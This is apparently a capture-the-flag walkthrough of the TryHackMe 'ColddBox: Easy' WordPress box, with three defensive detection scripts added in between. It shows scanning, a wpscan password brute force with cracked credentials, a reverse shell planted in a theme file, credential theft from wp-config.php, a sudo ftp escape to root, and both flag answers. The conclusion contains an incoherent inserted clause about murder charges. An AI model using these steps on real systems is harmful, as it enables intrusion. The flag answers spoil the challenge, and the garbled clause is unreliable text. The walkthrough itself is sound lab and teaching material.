In this walkthrough, we will be going through the ColddBox: Easy room from TryHackMe. This room is rated as Easy on the platform and covers exploitation of the WordPress CMS and privilege escalation. We have to capture two flags to complete this room. So, let’s get started without any delay.

Machine Info:

| Field | Value |
|---|---|
| Title | ColddBox-ColddSecurity |
| IP address | 10.10.185.226 |
| Difficulty | Easy |
| Objective | An easy level machine with multiple ways to escalate privileges. |
Enumeration:
- I started off with my regular nmap ritual, consisting of two scans: one of the 1000 most common ports with service detection, and a full port scan to reveal anything the first one missed. Found two ports open: 80 (HTTP) and 4512 (SSH).
sudo nmap -sS -sV 10.10.185.226

sudo nmap -sS -T4 -p- 10.10.185.226

- Opening the HTTP server in a browser, we found a blog running our good old friend: WordPress.

- Next, I fired up gobuster against the machine to reveal endpoints worth exploring. Found one: /hidden
wh1terose@fsociety:~$ gobuster dir -u http://10.10.185.226/ -w ~/Desktop/Wordlist/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.185.226/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/06/23 21:37:18 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/hidden (Status: 301) [Size: 315] [--> http://10.10.185.226/hidden/]
/index.php (Status: 301) [Size: 0] [--> http://10.10.185.226/]
/server-status (Status: 403) [Size: 278]
/wp-admin (Status: 301) [Size: 317] [--> http://10.10.185.226/wp-admin/]
/wp-content (Status: 301) [Size: 319] [--> http://10.10.185.226/wp-content/]
/wp-includes (Status: 301) [Size: 320] [--> http://10.10.185.226/wp-includes/]
/xmlrpc.php (Status: 200) [Size: 42]
===============================================================
2023/06/23 21:38:57 Finished
==============================================================
- Navigating to the hidden directory reveals potential usernames (c0ldd, hugo and Philip) and indicates that a password change has been done for hugo.

- Moving on, I used wpscan to enumerate usernames and other useful information about our WordPress blog. It found four active users and a vulnerable theme. I searched for known exploits for the theme version and the WordPress core but found nothing useful.
wh1terose@fsociety:~$ wpscan --url http://10.10.185.226 -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.185.226/ [10.10.185.226]
[+] Started: Fri Jun 23 21:45:40 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.185.226/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.185.226/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.185.226/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.185.226/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
| - http://10.10.185.226/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
[+] WordPress theme in use: twentyfifteen
| Location: http://10.10.185.226/wp-content/themes/twentyfifteen/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://10.10.185.226/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 3.4
| Style URL: http://10.10.185.226/wp-content/themes/twentyfifteen/style.css?ver=4.1.31
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.185.226/wp-content/themes/twentyfifteen/style.css?ver=4.1.31, Match: 'Version: 1.0'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <========================================================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] the cold in person
| Found By: Rss Generator (Passive Detection)
[+] hugo
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] philip
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] c0ldd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Jun 23 21:45:46 2023
[+] Requests Done: 29
[+] Cached Requests: 36
[+] Data Sent: 7.366 KB
[+] Data Received: 45.141 KB
[+] Memory used: 170.094 MB
[+] Elapsed time: 00:00:06
- Next, I used the last resort: brute force. I used wpscan to brute-force the password of one of the users. Note that this one might take some time, so be patient and let it run. In the attempts below, you can see a success. With that success in mind, let’s move ahead to the exploitation phase.
wh1terose@fsociety:~$ wpscan --url http://10.10.185.226 --password-attack wp-login -P ~/Desktop/Wordlist/rockyou.txt -t 50
[+] URL: http://10.10.185.226/ [10.10.185.226]
[+] Started: Fri Jun 23 22:28:19 2023
-- snipped --
[+] Performing password attack on Wp Login against 4 user/s
Trying the cold in person / 1234567 Time: 00:00:07 <> (1 / 60000) 0.00%
Trying the cold in person / 123456789 Time: 00:00:07 <> (2 / 60000) 0.00% ETA: 6Trying the cold in person / iloveyou Time: 00:00:08 <> (6 / (2488 / 60000) 4.14% ETA:
-- snipped --
0Trying the cold in person / 5.00% ETA: Trying the ETA: 0[SUCCESS] - c0ldd / 9876543210
-- snipped --
[!] Valid Combinations Found:
| Username: c0ldd, Password: 9876543210
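From the defender’s side, the attack above leaves a very loud trace in the web server log: a burst of POSTs to wp-login.php from one client, followed by a 302 the moment a guess works (WordPress re-renders the form with a 200 on failure and redirects on success). The following detection script is an added example, not part of the writeup; the log lines are constructed and the threshold and window are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-log excerpt (not taken from the box): one client
# hammers wp-login.php the way a wpscan password attack does. WordPress answers
# a failed login with 200 (the form again) and a successful one with a 302.
SAMPLE_LOG = "\n".join(
    ['10.9.1.5 - - [23/Jun/2023:22:28:%02d +0000] "POST /wp-login.php HTTP/1.1" 200 4123 "-" "WPScan v3.8.22"' % s
     for s in range(19, 27)]
    + ['192.168.1.20 - - [23/Jun/2023:22:28:25 +0000] "GET /hidden/ HTTP/1.1" 200 315 "-" "Mozilla/5.0"',
       '10.9.1.5 - - [23/Jun/2023:22:28:27 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.8.22"'])

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

def parse_line(line):
    """Return (ip, timestamp, method, path-without-query, status) or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path.split("?")[0], int(status)

def detect_login_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag clients with at least `threshold` POSTs to wp-login.php inside any window.

    Returns {ip: {"max_in_window": n, "success_after_burst": bool}}.
    """
    posts = defaultdict(list)  # ip -> [(timestamp, status)]
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == "/wp-login.php":
            posts[rec[0]].append((rec[1], rec[4]))
    findings = {}
    for ip, events in posts.items():
        events.sort()
        best, start = 0, 0
        for end in range(len(events)):  # sliding window over sorted timestamps
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            # A 302 among the burst means a guess worked: treat as a compromise, not just noise.
            success = any(status == 302 for _, status in events)
            findings[ip] = {"max_in_window": best, "success_after_burst": success}
    return findings

if __name__ == "__main__":
    for ip, finding in detect_login_bruteforce(SAMPLE_LOG).items():
        print(ip, finding)
```

Rate-limiting wp-login.php and xmlrpc.php (which wpscan also flagged as enabled) cuts the attempt rate that makes this attack practical in the first place.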


Initial Access:
- Log into the WordPress dashboard using the found credentials.

- Next, we exploit the theme customizer functionality of WordPress, replacing the code of the theme’s 404.php file with our PHP reverse shell.

- To execute the shell, navigate to the following URL: it returns a 404 error, executing our code in the background. Set up the netcat listener before navigating to the URL and you will be greeted with a prompt. Next, I tried to read the user flag but was unable to, as we only have the privileges of the web service user and need access as user c0ldd.
Link: http://10.10.185.226/?p=1000
wh1terose@fsociety:~$ nc -lvnp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.185.226 47576
Linux ColddBox-Easy 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
19:40:54 up 1:39, 0 users, load average: 0.00, 0.89, 9.88
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ColddBox-Easy:/$ cd /home
cd /home
www-data@ColddBox-Easy:/home$ ls -l
ls -l
total 4
drwxr-xr-x 3 c0ldd c0ldd 4096 Oct 19 2020 c0ldd
www-data@ColddBox-Easy:/home$ cd c0ldd
cd c0ldd
www-data@ColddBox-Easy:/home/c0ldd$ ls -l
ls -l
total 4
-rw-rw---- 1 c0ldd c0ldd 53 Sep 24 2020 user.txt
www-data@ColddBox-Easy:/home/c0ldd$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@ColddBox-Easy:/home/c0ldd$ 
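The step above only works because the dashboard lets an administrator rewrite theme PHP; `define('DISALLOW_FILE_EDIT', true);` in wp-config.php removes that editor outright. For installs where the editor stays on, a hash baseline of the theme directory turns an edited 404.php into a concrete alert. The script below is an added example, not the writeup’s code; the theme directory it builds is constructed in a temp folder with placeholder content.

```python
import hashlib
import os
import tempfile

def hash_tree(root):
    """Map every file under root (path relative to root, '/'-separated) to its SHA-256."""
    digests = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests

def diff_baseline(baseline, current):
    """Compare two hash_tree() results; every entry returned is a file to inspect."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }

def demo():
    """Constructed theme directory: baseline it, then simulate an editor-made change to 404.php."""
    with tempfile.TemporaryDirectory() as themes:
        theme = os.path.join(themes, "twentyfifteen")
        os.makedirs(theme)
        files = {"404.php": "<?php get_header(); ?>\n<h1>Not found</h1>\n<?php get_footer(); ?>\n",
                 "style.css": "/*\nTheme Name: Twenty Fifteen\n*/\n"}
        for name, body in files.items():
            with open(os.path.join(theme, name), "w") as fh:
                fh.write(body)
        baseline = hash_tree(themes)  # record this right after a clean install
        # Simulated tampering (placeholder text, not a payload): 404.php rewritten, a new file dropped.
        with open(os.path.join(theme, "404.php"), "w") as fh:
            fh.write("<?php /* edited through the dashboard */ ?>\n")
        with open(os.path.join(theme, "dropped.php"), "w") as fh:
            fh.write("<?php ?>\n")
        return diff_baseline(baseline, hash_tree(themes))

if __name__ == "__main__":
    print(demo())
```

In practice the baseline is stored off-host and the comparison runs from cron, so an attacker with www-data rights cannot quietly update it.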
- Browsing around the file system reveals the wp-config.php file, which is a gold mine for credentials, and that is exactly what happened: I found the credentials for user c0ldd. Switched to that user with them and got the user flag.
www-data@ColddBox-Easy:/var/www/html$ ls
ls
hidden wp-blog-header.php wp-includes wp-signup.php
index.php wp-comments-post.php wp-links-opml.php wp-trackback.php
license.txt wp-config-sample.php wp-load.php xmlrpc.php
readme.html wp-config.php wp-login.php
wp-activate.php wp-content wp-mail.php
wp-admin wp-cron.php wp-settings.php
www-data@ColddBox-Easy:/var/www/html$ cat wp-config.php
cat wp-config.php
<?php
/**
-- snipped --
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'colddbox');
/** MySQL database username */
define('DB_USER', 'c0ldd');
/** MySQL database password */
define('DB_PASSWORD', 'cybersecurity');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
-- snipped -- 

Privilege Escalation:
- For privilege escalation, I checked for sudo misconfigurations and found three binaries to choose from for exploitation.
c0ldd@ColddBox-Easy:/var/www/html$ sudo -l
sudo -l
[sudo] password for c0ldd: cybersecurity
Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
(root) /usr/bin/vim
(root) /bin/chmod
(root) /usr/bin/ftp

- Used GTFOBins to exploit the ftp binary, root the machine and claim the root flag.

c0ldd@ColddBox-Easy:/var/www/html$ sudo ftp
sudo ftp
ftp> !/bin/sh
!/bin/sh
# id
id
uid=0(root) gid=0(root) grupos=0(root)
# python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@ColddBox-Easy:/var/www/html# cd /root
cd /root
root@ColddBox-Easy:/root# ls
ls
root.txt
root@ColddBox-Easy:/root# cat root.txt
cat root.txt
wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=
root@ColddBox-Easy:/root#
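A defender-side check for the same misconfiguration, as an added example (not from the writeup): it parses `sudo -l` output like the one shown earlier and flags rules that hand out more than the named command, with a remediation hint for each. The sample output is constructed from the box’s Spanish-locale format, and the binary lists are small constructed subsets, not a complete catalogue.

```python
import re

# Constructed `sudo -l` output modelled on the box (Spanish locale); only the
# "(runas) command" lines matter, so the wording of the header line does not.
SAMPLE_SUDO_L = """\
El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
"""

# Constructed subsets: interactive programs with a shell escape, and programs
# that rewrite any file's ownership or mode when run as root.
SHELL_ESCAPE = {"vim", "vi", "nano", "less", "more", "man", "ftp", "find", "awk", "perl", "python3"}
OWNERSHIP_OR_MODE = {"chmod", "chown"}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<nopasswd>NOPASSWD:\s*)?(?P<cmds>.+)$")

def parse_sudo_l(text):
    """Return [(runas_user, nopasswd, command)] from `sudo -l` output, one tuple per command."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip()  # "(root : root)" -> "root"
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append((runas_user, bool(m.group("nopasswd")), cmd))
    return rules

def audit(text):
    """Return [(command, reason)] for rules that let the user reach root beyond the command itself."""
    findings = []
    for runas, _nopasswd, cmd in parse_sudo_l(text):
        if runas not in ("root", "ALL"):
            continue  # rules that do not grant root are out of scope here
        basename = cmd.split()[0].rsplit("/", 1)[-1]
        if cmd == "ALL":
            findings.append((cmd, "unrestricted root"))
        elif basename in SHELL_ESCAPE:
            findings.append((cmd, "interactive program with a shell escape; drop it or wrap it with fixed arguments"))
        elif basename in OWNERSHIP_OR_MODE:
            findings.append((cmd, "can change the mode/owner of any file; restrict to fixed arguments"))
    return findings

if __name__ == "__main__":
    for cmd, reason in audit(SAMPLE_SUDO_L):
        print(f"{cmd}: {reason}")
```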
Task 1 – boot2Root
Question 1 – user.txt
RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==
Question 2 – root.txt
wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=
Conclusion:

So that was “ColddBox: Easy” for you. We started off with a regular nmap scan and found two ports open: 80 (HTTP) and 4512 (SSH). Next, we enumerated the WordPress installation on port 80. Fired up gobuster on the server and found a hidden directory. Then I used wpscan to enumerate users in the WordPress installation and used the same tool to brute-force the password of user c0ldd. With that password, I got access to the WordPress dashboard, where I replaced the contents of the 404.php file with our PHP reverse shell. Executed it and got a connection back to our netcat listener. Moving on, we horizontally escalated our privileges by peeking into the wp-config.php file and getting the credentials of user c0ldd from there. At last, we escalated our privileges to root by exploiting the sudo misconfiguration of the ftp binary and got the root flag and conviction of murder charges of my own family. On that note, I will take your leave and meet you in the next one. Till then, “Happy hacking”.